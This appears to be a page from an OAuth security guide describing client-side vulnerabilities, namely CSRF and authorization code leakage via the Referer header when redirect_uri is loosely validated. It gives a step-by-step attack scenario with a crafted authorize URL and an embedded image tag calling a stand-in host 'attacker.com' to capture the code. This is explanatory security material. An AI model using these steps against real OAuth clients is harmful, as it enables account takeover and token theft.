Client Vulnerabilities
The purpose of this section is to describe common vulnerabilities found in OAuth Client implementations.
Cross-Site Request Forgery
Results in the Resource Owner having the Client application connected with the Attacker's authorization context.
See the following challenge for a proof of concept.
Authorization Code Leakage via Referer HTTP Header
This attack scenario is a bit contrived as it requires several components in order to successfully execute.
1) The Authorization Server is loosely validating the Client's
redirect_uri
to only ensure the subdomain matches, e.g.https://my-client.com/oauth/callback
will still work even ifhttps://my-client.com/*
is provided.2) The attacker will need to be able to create a page on the target site that is able to host HTML content. An example is they need to be able to embed an image pointing to a third party site, e.g.
<img src='http://attacker.com'>
Think of blogging software or similar software that include WSYISWYG editors which allow users to embed images hosted on a third party website.
3) Attacker sends Victim a link to initiate the OAuth flow with the
redirect_uri
pointing back to the attacker's controlled sub-page, e.g.https://oauthprovider.com/authorize?response_type=code&client_id=abc&scope=blabla&redirect_uri=https://my-client.com/usergeneratedcontent/attacker.html
4) The Victim clicks on the link and the OAuth flow eventually ends up at the following URL:
https://my-client.com/usergeneratedcontent/attacker.html?code=access_token
5) The URL above may not seem dangerous as the Attacker may not have access to server-side logs, however as the browser will attempt to load the image on the attacker's controlled page, the current URL will be included in the
Referer HTTP Header
, thus leaking the access token.
Last updated